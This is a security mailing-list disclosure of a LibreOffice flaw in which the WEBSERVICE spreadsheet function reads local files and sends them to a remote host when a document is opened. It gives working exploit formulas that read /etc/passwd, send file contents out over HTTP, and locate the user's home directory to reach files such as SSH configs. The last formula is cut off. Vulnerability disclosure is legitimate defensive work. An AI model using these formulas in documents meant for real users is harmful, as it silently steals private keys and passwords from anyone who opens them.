Hello, After I know that the reported vulnerability was already known to developers, but they did not include trivial fix to 6.0, but (as the developer said, I did not check it byself) include to 5.4.5 (it means this is a silent fixed vulnerability) with a month lag between updates I think it's more correct to full disclose it. PoC: https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure # Vulnerability description ## First part LibreOffice supports COM.MICROSOFT.WEBSERVICE function: https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 The function is required to obtain data by URL, usually used as: =FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time/temperature/@value)") In original: For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value. In LibreOffice, these restrictions are not implemented. ## Second part By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document. # Exploitation To read file you need just: =WEBSERVICE("/etc/passwd") This function can also be used to send a file: =WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd")) For successful operation, you need to send the files of the current user, so you need to retrieve current user home path. =MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=", Also you can parse other files too, like a ~/.ssh/config or something like that. For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works). # Impact It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, support all modern versions of LibreOffice and may be embedded in almost all formats supporting by LO.
Description: PGP signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/